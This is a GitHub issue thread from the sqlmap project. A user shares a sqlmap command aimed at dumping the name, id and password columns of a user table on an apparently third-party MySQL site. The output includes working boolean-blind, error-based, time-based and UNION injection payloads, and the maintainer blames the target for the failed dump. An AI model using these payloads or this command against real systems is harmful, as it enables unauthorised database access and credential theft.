sqlmapproject / sqlmap

Automatic SQL injection and database takeover tool
http://sqlmap.org

[WARNING] something went wrong with full UNION #1742

Closed syntaxerror454 closed 8 years ago

syntaxerror454 commented 8 years ago

sqlmap -r ndeh -D database -T Tuser -C name,id,password --dump --level 5 --risk 3 --time-sec 1000 --parse-errors -p bulan --ignore-proxy --random-agent --threads 2 --no-cast

{1.0-dev-nongit-201602010a89}
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 12:59:17

[12:59:17] [INFO] parsing HTTP request from 'ndeh'
[12:59:17] [INFO] fetched random HTTP User-Agent header from file '/usr/share/sqlmap/txt/user-agents.txt': 'Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2'
[12:59:17] [INFO] resuming back-end DBMS 'mysql'
[12:59:18] [INFO] testing connection to the target URL
[12:59:19] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS

sqlmap resumed the following injection point(s) from stored session:

Parameter: bulan (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (Generic comment)
Payload: bulan=-1128') OR 3282=3282-- -&tahun=2016&submit=go!

Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause
Payload: bulan=-8534') OR 1 GROUP BY CONCAT(0x7178706271,(SELECT (CASE WHEN (7816=7816) THEN 1 ELSE 0 END)),0x716b6a6a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#&tahun=2016&submit=go!

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)
Payload: bulan=03') AND (SELECT * FROM (SELECT(SLEEP(1000)))APXw)#&tahun=2016&submit=go!

Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: bulan=03') UNION ALL SELECT NULL,CONCAT(0x7178706271,0x5358474e4358684855714a4577486854507354466162434d5054456a4d5a6b6e5058704f4657656f,0x716b6a6a71),NULL,NULL,NULL,NULL-- -&tahun=2016&submit=go!

[12:59:19] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5
[12:59:19] [INFO] fetching entries of column(s) 'name, id, password' entries for table 'T_user' in database 'database'
[12:59:19] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries). Falling back to partial UNION technique
[12:59:19] [WARNING] the SQL query provided does not return any output
[12:59:20] [WARNING] the SQL query provided does not return any output
[12:59:20] [INFO] fetching number of column(s) 'name, id, password' entries for table 'T_user' in database 'database'
[12:59:20] [INFO] retrieved:
[12:59:21] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[12:59:21] [WARNING] time-based comparison requires larger statistical model, please wait................
[12:59:23] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[12:59:23] [WARNING] unable to retrieve the number of column(s) 'name, id, password' entries for table 'T_user' in database 'database'
[12:59:23] [INFO] fetched data logged to text files under '/root/.sqlmap/output/website'.

[*] shutting down at 12:59:23

I got tired about this reason, please help me to find why? :(

stamparm commented 8 years ago

You are not getting anything with 4 different methods: full union, partial union, error-based, time-based. I would say that you have problems with your target, not the sqlmap.